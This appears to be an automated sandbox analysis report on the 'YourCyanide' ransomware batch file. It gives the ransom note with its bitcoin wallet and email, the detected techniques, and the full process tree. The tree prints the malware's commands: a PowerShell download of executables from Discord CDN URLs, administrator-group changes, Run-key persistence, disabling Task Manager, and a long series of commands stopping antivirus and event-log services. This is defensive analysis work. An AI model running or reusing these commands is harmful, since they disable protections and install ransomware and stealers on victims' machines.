6d4eafaeac05daa575d551127bffc77e92fae88887c3168318fe50dc26b8d725

Analysis

max time kernel
491s
max time network
494s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
22-05-2022 23:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

YourCyanide.bat
Size

150KB
MD5

fdd17cbaa7423d1c9ca1ffb376d30b36
SHA1

47986c795d7a2521408f4f63a6b068c054659bc7
SHA256

6d4eafaeac05daa575d551127bffc77e92fae88887c3168318fe50dc26b8d725
SHA512

3aa57c435f462bea43ba87d527603ceabedff24c1353e64dc9b6e2c89956d2216030030e14056095afb4db17eb44f6f33dbed95054d5852cd9a4eccb5d6088cf

Score

10^/10

evasion persistence ransomware spyware stealer suricata

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/974798125011198003/976894591552860220/NoKeyB.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/974798125011198003/976939955140038656/GetToken.exe

Extracted

Path

C:\Users\Admin\Desktop\YcynNote.txt

Ransom Note

Q: What happened to my files? A: Oops your files have been encrypted by YourCyanide. Q: how can I get them back? A: You can get them back by paying $500 in bitcoin to this btc wallet bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf. Q: What happens if I dont pay? A: You will never get your files back. Q: How can I contact you? A: contact at yourcyanide.help@gmail.com. Q: How many files were encrypted? A: 24327 files have been encrypted. -Love YourCyanide 1:27:16.63, Mon 05/23/2022

Emails

yourcyanide.help@gmail.com

Signatures

suricata: ET MALWARE Windows TaskList Microsoft Windows DOS prompt command exit OUTBOUND
suricata: ET MALWARE Windows TaskList Microsoft Windows DOS prompt command exit OUTBOUND
suricata
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Blocklisted process makes network request 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

6 4080 powershell.exe
25 1520 powershell.exe
32 1152 powershell.exe
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

NoKeyB.exeGetToken.exe

pid process

4532 NoKeyB.exe
3344 GetToken.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation cmd.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

flow	pid	process
6	4080	powershell.exe
25	1520	powershell.exe
32	1152	powershell.exe

pid	process
4532	NoKeyB.exe
3344	GetToken.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	cmd.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_25967_toolbar = "C:\\Users\\Admin\\AppData\\Local\\Temp\\YourCyanide.bat"	reg.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

cmd.exe

description	ioc	process
File opened (read-only)	\??\G:	cmd.exe
File opened (read-only)	\??\I:	cmd.exe
File opened (read-only)	\??\K:	cmd.exe
File opened (read-only)	\??\P:	cmd.exe
File opened (read-only)	\??\R:	cmd.exe
File opened (read-only)	\??\Z:	cmd.exe
File opened (read-only)	\??\A:	cmd.exe
File opened (read-only)	\??\E:	cmd.exe
File opened (read-only)	\??\L:	cmd.exe
File opened (read-only)	\??\M:	cmd.exe
File opened (read-only)	\??\N:	cmd.exe
File opened (read-only)	\??\T:	cmd.exe
File opened (read-only)	\??\U:	cmd.exe
File opened (read-only)	\??\V:	cmd.exe
File opened (read-only)	\??\F:	cmd.exe
File opened (read-only)	\??\J:	cmd.exe
File opened (read-only)	\??\S:	cmd.exe
File opened (read-only)	\??\X:	cmd.exe
File opened (read-only)	\??\B:	cmd.exe
File opened (read-only)	\??\O:	cmd.exe
File opened (read-only)	\??\W:	cmd.exe
File opened (read-only)	\??\Y:	cmd.exe
File opened (read-only)	\??\H:	cmd.exe
File opened (read-only)	\??\Q:	cmd.exe

Drops file in Windows directory 2 IoCs

Processes:

cmd.exe

description ioc process

File opened for modification C:\Windows\win.ini cmd.exe
File opened for modification C:\Windows\system.ini cmd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

4872 tasklist.exe

description	ioc	process
File opened for modification	C:\Windows\win.ini	cmd.exe
File opened for modification	C:\Windows\system.ini	cmd.exe

pid	process
4872	tasklist.exe

Modifies registry class 21 IoCs

Processes:

powershell.execmd.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings	powershell.exe

NTFS ADS 2 IoCs

Processes:

cmd.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Documents\%c¼├XV:~30	cmd.exe
File opened for modification	C:\Users\Admin\Desktop\%c¼├XV:~23	cmd.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 23 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4080	powershell.exe
4080	powershell.exe
4708	powershell.exe
4708	powershell.exe
4708	powershell.exe
1520	powershell.exe
1520	powershell.exe
1520	powershell.exe
3700	powershell.exe
3700	powershell.exe
3700	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
1016	powershell.exe
1016	powershell.exe
1016	powershell.exe
1296	powershell.exe
1296	powershell.exe
1296	powershell.exe
1868	powershell.exe
1868	powershell.exe
1868	powershell.exe

Suspicious use of AdjustPrivilegeToken 53 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exesvchost.exepowershell.exetasklist.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4080	powershell.exe
Token: SeDebugPrivilege	4708	powershell.exe
Token: SeDebugPrivilege	1520	powershell.exe
Token: SeDebugPrivilege	3700	powershell.exe
Token: SeDebugPrivilege	1152	powershell.exe
Token: SeDebugPrivilege	1016	powershell.exe
Token: SeIncreaseQuotaPrivilege	1016	powershell.exe
Token: SeSecurityPrivilege	1016	powershell.exe
Token: SeTakeOwnershipPrivilege	1016	powershell.exe
Token: SeLoadDriverPrivilege	1016	powershell.exe
Token: SeSystemProfilePrivilege	1016	powershell.exe
Token: SeSystemtimePrivilege	1016	powershell.exe
Token: SeProfSingleProcessPrivilege	1016	powershell.exe
Token: SeIncBasePriorityPrivilege	1016	powershell.exe
Token: SeCreatePagefilePrivilege	1016	powershell.exe
Token: SeBackupPrivilege	1016	powershell.exe
Token: SeRestorePrivilege	1016	powershell.exe
Token: SeShutdownPrivilege	1016	powershell.exe
Token: SeDebugPrivilege	1016	powershell.exe
Token: SeSystemEnvironmentPrivilege	1016	powershell.exe
Token: SeRemoteShutdownPrivilege	1016	powershell.exe
Token: SeUndockPrivilege	1016	powershell.exe
Token: SeManageVolumePrivilege	1016	powershell.exe
Token: 33	1016	powershell.exe
Token: 34	1016	powershell.exe
Token: 35	1016	powershell.exe
Token: 36	1016	powershell.exe
Token: SeShutdownPrivilege	2552	svchost.exe
Token: SeCreatePagefilePrivilege	2552	svchost.exe
Token: SeDebugPrivilege	1296	powershell.exe
Token: SeIncreaseQuotaPrivilege	1296	powershell.exe
Token: SeSecurityPrivilege	1296	powershell.exe
Token: SeTakeOwnershipPrivilege	1296	powershell.exe
Token: SeLoadDriverPrivilege	1296	powershell.exe
Token: SeSystemProfilePrivilege	1296	powershell.exe
Token: SeSystemtimePrivilege	1296	powershell.exe
Token: SeProfSingleProcessPrivilege	1296	powershell.exe
Token: SeIncBasePriorityPrivilege	1296	powershell.exe
Token: SeCreatePagefilePrivilege	1296	powershell.exe
Token: SeBackupPrivilege	1296	powershell.exe
Token: SeRestorePrivilege	1296	powershell.exe
Token: SeShutdownPrivilege	1296	powershell.exe
Token: SeDebugPrivilege	1296	powershell.exe
Token: SeSystemEnvironmentPrivilege	1296	powershell.exe
Token: SeRemoteShutdownPrivilege	1296	powershell.exe
Token: SeUndockPrivilege	1296	powershell.exe
Token: SeManageVolumePrivilege	1296	powershell.exe
Token: 33	1296	powershell.exe
Token: 34	1296	powershell.exe
Token: 35	1296	powershell.exe
Token: 36	1296	powershell.exe
Token: SeDebugPrivilege	4872	tasklist.exe
Token: SeDebugPrivilege	1868	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

NoKeyB.exe

pid process

4532 NoKeyB.exe
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

NoKeyB.exe

pid process

4532 NoKeyB.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

NoKeyB.exepowershell.exe

pid process

4532 NoKeyB.exe
1868 powershell.exe

pid	process
4532	NoKeyB.exe

pid	process
4532	NoKeyB.exe

pid	process
4532	NoKeyB.exe
1868	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 4976 wrote to memory of 4936	4976	cmd.exe	attrib.exe
PID 4976 wrote to memory of 4936	4976	cmd.exe	attrib.exe
PID 4976 wrote to memory of 4240	4976	cmd.exe	rundll32.exe
PID 4976 wrote to memory of 4240	4976	cmd.exe	rundll32.exe
PID 4976 wrote to memory of 4080	4976	cmd.exe	powershell.exe
PID 4976 wrote to memory of 4080	4976	cmd.exe	powershell.exe
PID 4976 wrote to memory of 4532	4976	cmd.exe	NoKeyB.exe
PID 4976 wrote to memory of 4532	4976	cmd.exe	NoKeyB.exe
PID 4976 wrote to memory of 4708	4976	cmd.exe	powershell.exe
PID 4976 wrote to memory of 4708	4976	cmd.exe	powershell.exe
PID 4976 wrote to memory of 836	4976	cmd.exe	net.exe
PID 4976 wrote to memory of 836	4976	cmd.exe	net.exe
PID 836 wrote to memory of 4292	836	net.exe	net1.exe
PID 836 wrote to memory of 4292	836	net.exe	net1.exe
PID 4976 wrote to memory of 4196	4976	cmd.exe	reg.exe
PID 4976 wrote to memory of 4196	4976	cmd.exe	reg.exe
PID 4976 wrote to memory of 4224	4976	cmd.exe	reg.exe
PID 4976 wrote to memory of 4224	4976	cmd.exe	reg.exe
PID 4976 wrote to memory of 4268	4976	cmd.exe	net.exe
PID 4976 wrote to memory of 4268	4976	cmd.exe	net.exe
PID 4268 wrote to memory of 4176	4268	net.exe	net1.exe
PID 4268 wrote to memory of 4176	4268	net.exe	net1.exe
PID 4976 wrote to memory of 1836	4976	cmd.exe	net.exe
PID 4976 wrote to memory of 1836	4976	cmd.exe	net.exe
PID 1836 wrote to memory of 1792	1836	net.exe	net1.exe
PID 1836 wrote to memory of 1792	1836	net.exe	net1.exe
PID 4976 wrote to memory of 1460	4976	cmd.exe	net.exe
PID 4976 wrote to memory of 1460	4976	cmd.exe	net.exe
PID 1460 wrote to memory of 840	1460	net.exe	net1.exe
PID 1460 wrote to memory of 840	1460	net.exe	net1.exe
PID 4976 wrote to memory of 2028	4976	cmd.exe	net.exe
PID 4976 wrote to memory of 2028	4976	cmd.exe	net.exe
PID 2028 wrote to memory of 2260	2028	net.exe	net1.exe
PID 2028 wrote to memory of 2260	2028	net.exe	net1.exe
PID 4976 wrote to memory of 1560	4976	cmd.exe	net.exe
PID 4976 wrote to memory of 1560	4976	cmd.exe	net.exe
PID 1560 wrote to memory of 4112	1560	net.exe	net1.exe
PID 1560 wrote to memory of 4112	1560	net.exe	net1.exe
PID 4976 wrote to memory of 2096	4976	cmd.exe	net.exe
PID 4976 wrote to memory of 2096	4976	cmd.exe	net.exe
PID 2096 wrote to memory of 1552	2096	net.exe	net1.exe
PID 2096 wrote to memory of 1552	2096	net.exe	net1.exe
PID 4976 wrote to memory of 2700	4976	cmd.exe	net.exe
PID 4976 wrote to memory of 2700	4976	cmd.exe	net.exe
PID 2700 wrote to memory of 2476	2700	net.exe	net1.exe
PID 2700 wrote to memory of 2476	2700	net.exe	net1.exe
PID 4976 wrote to memory of 372	4976	cmd.exe	net.exe
PID 4976 wrote to memory of 372	4976	cmd.exe	net.exe
PID 372 wrote to memory of 220	372	net.exe	net1.exe
PID 372 wrote to memory of 220	372	net.exe	net1.exe
PID 4976 wrote to memory of 1508	4976	cmd.exe	net.exe
PID 4976 wrote to memory of 1508	4976	cmd.exe	net.exe
PID 1508 wrote to memory of 1332	1508	net.exe	net1.exe
PID 1508 wrote to memory of 1332	1508	net.exe	net1.exe
PID 4976 wrote to memory of 1516	4976	cmd.exe	net.exe
PID 4976 wrote to memory of 1516	4976	cmd.exe	net.exe
PID 1516 wrote to memory of 4868	1516	net.exe	net1.exe
PID 1516 wrote to memory of 4868	1516	net.exe	net1.exe
PID 4976 wrote to memory of 1020	4976	cmd.exe	net.exe
PID 4976 wrote to memory of 1020	4976	cmd.exe	net.exe
PID 1020 wrote to memory of 2340	1020	net.exe	net1.exe
PID 1020 wrote to memory of 2340	1020	net.exe	net1.exe
PID 4976 wrote to memory of 4948	4976	cmd.exe	net.exe
PID 4976 wrote to memory of 4948	4976	cmd.exe	net.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

4936 attrib.exe

pid	process
4936	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\YourCyanide.bat"
1⤵
- Checks computer location settings
- Enumerates connected drives
- Drops file in Windows directory
- Modifies registry class
- NTFS ADS
- Suspicious use of WriteProcessMemory
PID:4976

C:\Windows\system32\attrib.exe
attrib +h +s C:\Users\Admin\AppData\Local\Temp\YourCyanide.bat
2⤵
- Views/modifies file attributes
PID:4936

C:\Windows\system32\rundll32.exe
RUNDLL32 USER32.DLL SwapMouseButton
2⤵
PID:4240

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/974798125011198003/976894591552860220/NoKeyB.exe', 'NoKeyB.exe')"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4080

C:\Users\Admin\Documents\NoKeyB.exe
NoKeyB.exe
2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4532

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Set-ExecutionPolicy Unrestricted"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4708

C:\Windows\system32\net.exe
net localgroup administrators session /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:836

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators session /ADD
3⤵
PID:4292

C:\Windows\system32\reg.exe
reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_25967_toolbar" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\YourCyanide.bat /f
2⤵
- Adds Run key to start application
PID:4196

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
2⤵
PID:4224

C:\Windows\system32\net.exe
net stop "Security Center" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:4268

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Security Center" /y
3⤵
PID:4176

C:\Windows\system32\net.exe
net stop "Automatic Updates" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1836

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Automatic Updates" /y
3⤵
PID:1792

C:\Windows\system32\net.exe
net stop "Symantec Core LC" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1460

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Symantec Core LC" /y
3⤵
PID:840

C:\Windows\system32\net.exe
net stop "SAVScan" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:2028

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SAVScan" /y
3⤵
PID:2260

C:\Windows\system32\net.exe
net stop "norton AntiVirus Firewall Monitor Service" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1560

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Firewall Monitor Service" /y
3⤵
PID:4112

C:\Windows\system32\net.exe
net stop "norton AntiVirus Auto-Protect Service" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:2096

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Auto-Protect Service" /y
3⤵
PID:1552

C:\Windows\system32\net.exe
net stop "norton AntiVirus Auto Protect Service" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:2700

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
3⤵
PID:2476

C:\Windows\system32\net.exe
net stop "McAfee Spamkiller Server" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:372

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfee Spamkiller Server" /y
3⤵
PID:220

C:\Windows\system32\net.exe
net stop "McAfee Personal Firewall Service" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1508

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfee Personal Firewall Service" /y
3⤵
PID:1332

C:\Windows\system32\net.exe
net stop "McAfee SecurityCenter Update Manager" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1516

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfee SecurityCenter Update Manager" /y
3⤵
PID:4868

C:\Windows\system32\net.exe
net stop "Symantec SPBBCSvc" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1020

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Symantec SPBBCSvc" /y
3⤵
PID:2340

C:\Windows\system32\net.exe
net stop "Ahnlab Task Scheduler" /y
2⤵
PID:4948

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Ahnlab Task Scheduler" /y
3⤵
PID:2044

C:\Windows\system32\net.exe
net stop navapsvc /y
2⤵
PID:3704

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop navapsvc /y
3⤵
PID:3728

C:\Windows\system32\net.exe
net stop "Sygate Personal Firewall Pro" /y
2⤵
PID:4924

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
3⤵
PID:776

C:\Windows\system32\net.exe
net stop vrmonsvc /y
2⤵
PID:4388

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop vrmonsvc /y
3⤵
PID:4264

C:\Windows\system32\net.exe
net stop MonSvcNT /y
2⤵
PID:1252

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MonSvcNT /y
3⤵
PID:5008

C:\Windows\system32\net.exe
net stop SAVScan /y
2⤵
PID:3316

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SAVScan /y
3⤵
PID:4820

C:\Windows\system32\net.exe
net stop NProtectService /y
2⤵
PID:3244

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NProtectService /y
3⤵
PID:3840

C:\Windows\system32\net.exe
net stop ccSetMGR /y
2⤵
PID:4996

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccSetMGR /y
3⤵
PID:4620

C:\Windows\system32\net.exe
net stop ccEvtMGR /y
2⤵
PID:1132

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccEvtMGR /y
3⤵
PID:1152

C:\Windows\system32\net.exe
net stop srservice /y
2⤵
PID:4888

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop srservice /y
3⤵
PID:1384

C:\Windows\system32\net.exe
net stop "Symantec Network Drivers Service" /y
2⤵
PID:1388

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Symantec Network Drivers Service" /y
3⤵
PID:4384

C:\Windows\system32\net.exe
net stop "norton Unerase Protection" /y
2⤵
PID:876

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton Unerase Protection" /y
3⤵
PID:4720

C:\Windows\system32\net.exe
net stop MskService /y
2⤵
PID:740

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MskService /y
3⤵
PID:3692

C:\Windows\system32\net.exe
net stop MpfService /y
2⤵
PID:4328

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MpfService /y
3⤵
PID:2780

C:\Windows\system32\net.exe
net stop mcupdmgr.exe /y
2⤵
PID:4696

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mcupdmgr.exe /y
3⤵
PID:3548

C:\Windows\system32\net.exe
net stop "McAfeeAntiSpyware" /y
2⤵
PID:3292

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfeeAntiSpyware" /y
3⤵
PID:2040

C:\Windows\system32\net.exe
net stop helpsvc /y
2⤵
PID:2432

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop helpsvc /y
3⤵
PID:4216

C:\Windows\system32\net.exe
net stop ERSvc /y
2⤵
PID:3736

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ERSvc /y
3⤵
PID:1448

C:\Windows\system32\net.exe
net stop "*norton*" /y
2⤵
PID:4612

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "*norton*" /y
3⤵
PID:4004

C:\Windows\system32\net.exe
net stop "*Symantec*" /y
2⤵
PID:4332

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "*Symantec*" /y
3⤵
PID:3680

C:\Windows\system32\net.exe
net stop "*McAfee*" /y
2⤵
PID:4628

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "*McAfee*" /y
3⤵
PID:3804

C:\Windows\system32\net.exe
net stop ccPwdSvc /y
2⤵
PID:3100

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccPwdSvc /y
3⤵
PID:3232

C:\Windows\system32\net.exe
net stop "Symantec Core LC" /y
2⤵
PID:3560

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Symantec Core LC" /y
3⤵
PID:2784

C:\Windows\system32\net.exe
net stop navapsvc /y
2⤵
PID:1872

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop navapsvc /y
3⤵
PID:3448

C:\Windows\system32\net.exe
net stop "Serv-U" /y
2⤵
PID:4440

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Serv-U" /y
3⤵
PID:3892

C:\Windows\system32\net.exe
net stop "norton AntiVirus Auto Protect Service" /y
2⤵
PID:3888

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
3⤵
PID:4040

C:\Windows\system32\net.exe
net stop "norton AntiVirus Client" /y
2⤵
PID:3092

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Client" /y
3⤵
PID:4540

C:\Windows\system32\net.exe
net stop "Symantec AntiVirus Client" /y
2⤵
PID:2104

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Symantec AntiVirus Client" /y
3⤵
PID:2388

C:\Windows\system32\net.exe
net stop "norton AntiVirus Server" /y
2⤵
PID:4044

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Server" /y
3⤵
PID:4236

C:\Windows\system32\net.exe
net stop "NAV Alert" /y
2⤵
PID:2832

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NAV Alert" /y
3⤵
PID:4240

C:\Windows\system32\net.exe
net stop "Nav Auto-Protect" /y
2⤵
PID:3616

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Nav Auto-Protect" /y
3⤵
PID:2760

C:\Windows\system32\net.exe
net stop "McShield" /y
2⤵
PID:1968

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McShield" /y
3⤵
PID:4896

C:\Windows\system32\net.exe
net stop "DefWatch" /y
2⤵
PID:4932

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "DefWatch" /y
3⤵
PID:2444

C:\Windows\system32\net.exe
net stop eventlog /y
2⤵
PID:1272

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop eventlog /y
3⤵
PID:3648

C:\Windows\system32\net.exe
net stop InoRPC /y
2⤵
PID:1700

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop InoRPC /y
3⤵
PID:2572

C:\Windows\system32\net.exe
net stop InoRT /y
2⤵
PID:4692

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop InoRT /y
3⤵
PID:1248

C:\Windows\system32\net.exe
net stop InoTask /y
2⤵
PID:1980

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop InoTask /y
3⤵
PID:2260

C:\Windows\system32\net.exe
net stop "norton AntiVirus Auto Protect Service" /y
2⤵
PID:2028

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
3⤵
PID:3564

C:\Windows\system32\net.exe
net stop "norton AntiVirus Client" /y
2⤵
PID:2876

C:\Windows\system32\net.exe
net stop "norton AntiVirus Corporate Edition" /y
2⤵
PID:3476

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Corporate Edition" /y
3⤵
PID:2096

